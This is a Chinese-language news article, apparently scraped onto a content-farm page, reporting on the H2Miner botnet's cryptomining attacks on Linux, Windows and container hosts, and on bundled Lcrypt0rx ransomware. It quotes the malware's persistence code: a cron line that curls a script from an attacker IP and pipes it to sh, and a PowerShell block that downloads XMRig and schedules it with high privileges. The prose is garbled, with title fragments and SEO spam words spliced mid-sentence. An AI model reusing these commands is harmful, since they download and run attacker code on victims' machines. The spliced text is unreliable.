您现在的位置是:网络安全 >>正文
H2Miner 僵尸网络攻击 Linux、Windows 及容器设备进行门罗币挖矿
网络安全25762人已围观
简介首次发现于2019年末的H2Miner僵尸网络近期卷土重来,其攻击手段已突破加密货币劫持与勒索软件的界限。最新攻击活动利用廉价虚拟专用服务器(VPS)和多种常见恶意软件,同时入侵Linux主机、Win ...
首次发现于2019年末的僵尸及容H2Miner僵尸网络近期卷土重来 ,其攻击手段已突破加密货币劫持与勒索软件的网络挖矿界限。最新攻击活动利用廉价虚拟专用服务器(VPS)和多种常见恶意软件,攻击同时入侵Linux主机 、器设Windows工作站和容器工作负载。备进

攻击者通过组合云环境感知脚本 、行门跨平台编译二进制文件以及系统原生命令 ,罗币能在防御者察觉CPU负载异常前快速建立门罗币挖矿通道。建站模板僵尸及容攻击始于对配置错误服务或漏洞应用的网络挖矿利用,包括Apache ActiveMQ(CVE-2023-46604)和Log4Shell漏洞 。攻击
入侵成功后 ,器设僵尸网络会部署定制化加载脚本——Linux系统使用ce.sh ,备进Windows系统使用1.ps1——这些脚本会终止其他挖矿进程、行门禁用终端防护 ,罗币并从78.153.140.66下载XMRig挖矿程序。僵尸及容容器环境同样遭受攻击:spr.sh脚本会扫描Docker镜像并移除阿里云的云计算aegis防护代理 ,随后植入Kinsing恶意软件。
复合型攻击基础设施同一攻击基础设施还托管着位于47.97.113.36的Cobalt Strike团队服务器,以及伪装成"MicrosoftSoftware.exe"的Bitbucket代码仓库 ,显示出成熟的多层命令与控制(C2)架构。Fortinet分析师发现 ,高防服务器新型VBScript勒索软件Lcrypt0rx已与挖矿程序捆绑传播。

虽然其加密算法较为简单——采用8,192字符的XOR密钥结合文件专属盐值——但该脚本仍会覆写主引导记录(MBR),并在系统中散布伪装持久化钩子。

钱包地址与托管服务器的重叠表明 ,当前攻击者可能与H2Miner原始团队存在协作或从属关系。
持久化机制剖析H2Miner通过分层感染链实现持久化 。初始脚本会枚举防御进程 ,免费模板使用暴力正则表达式终止这些进程,并通过清除命令历史来抹除攻击痕迹 。

Linux系统中,ce.sh会植入每10分钟自我重下载的cron计划任务 :
复制( crontab -l 2>/dev/null ; \ echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -1.2.Windows系统则通过1.ps1脚本将XMRig注册为计划任务 :
复制$miner = "$env:TEMP\sysupdate.exe" Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner schtasks /create /f /tn "Update service for Windows Service" ` /tr "$miner" /sc minute /mo 15 /rl highest1.2.3.4. 复合防御策略需求在Windows平台,Lcrypt0rx通过Shell.Application提权后 ,会尝试修改Winlogon Shell和映像劫持(IFEO)注册表键实现持久化 。虽然注册表逻辑存在缺陷,但恶意软件通过部署6个辅助脚本(从循环执行杀毒软件终止的模板下载advapi32_ext.vbs,到基础自传播脚本USB_bridge.vbs)确保存活。

这些辅助脚本均以隐藏系统文件属性(+h +s +r)投放,并通过注册表自启动项调用。配合cpr.sh等频繁更新的脚本,即使部分组件被清除,僵尸网络仍能重建挖矿通道。防御者需全面清理容器镜像 、服务器租用计划任务、cron条目和异常注册表键,否则门罗币钱包(如4ASk4RhU...p8SahC)将在警报解除后持续窃取计算资源。
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“信息技术视野”。http://www.bziz.cn/news/189f399807.html
相关文章
网络安全的三个最关键领域
网络安全通过分析其多个平台上的数万亿个数据点,网络安全服务商Akamai Technologies公司的研究团队通过流行的网络攻击流量和技术发现了有关威胁行为者行为的新发现。这三份报告指出了最突出的安全趋势 ...
【网络安全】
阅读更多特斯拉被黑客攻击?如何保护您的Kubernetes集群并阻止黑客?
网络安全2018年黑客入侵了特斯拉在亚马逊上的Kubernetes容器集群。由于该集群控制台未设置密码保护,黑客便得以在一个Kubernetes pod中获取到访问凭证,然后据此访问其网络存储桶S3,通过S3 ...
【网络安全】
阅读更多你的家安全吗?如何在数字时代保护房屋?
网络安全随着技术的进步,窃贼也变得越来越聪明。确保房屋安全很重要。随着越来越多的人将技术融入日常生活,对精明的窃贼获取物品的不同方式保持警惕和明智至关重要。保护家庭安全的方法有很多,这里就有一些技术和其他进步 ...
【网络安全】
阅读更多
热门文章
最新文章
友情链接
- 戴尔数据泄露事件:测试实验室平台遭 World Leaks 黑客组织入侵
- 花漾搜索答题教程(掌握花漾搜索的技巧,快速解答各类题目)
- 戴尔易安信加固过的机箱,保证在远程和恶劣环境下工作的可靠性,满足边缘工作负载不断增长的需求
- 戴尔PowerEdge服务器 可轻松满足AI深度学习和高级计算等工作负载
- 多款热门 Chrome 扩展程序存在明文传输风险,用户隐私安全受威胁
- 朝鲜黑客组织 Kimsuky 利用 ChatGPT 伪造军人证件实施新型攻击
- 解决WiFi已连接但无法上网的问题(探索WiFi连接问题背后的原因及有效解决方案)
- 苹果6s搭载iOS10.3.1
- 华硕K45EI323VD-SL(解析华硕K45EI323VD-SL的特点和优势)
- 神舟战神笔记本电脑质量如何?(探索神舟战神笔记本电脑的品质与性能) 网站建设企业服务器源码库云服务器香港物理机b2b信息平台亿华云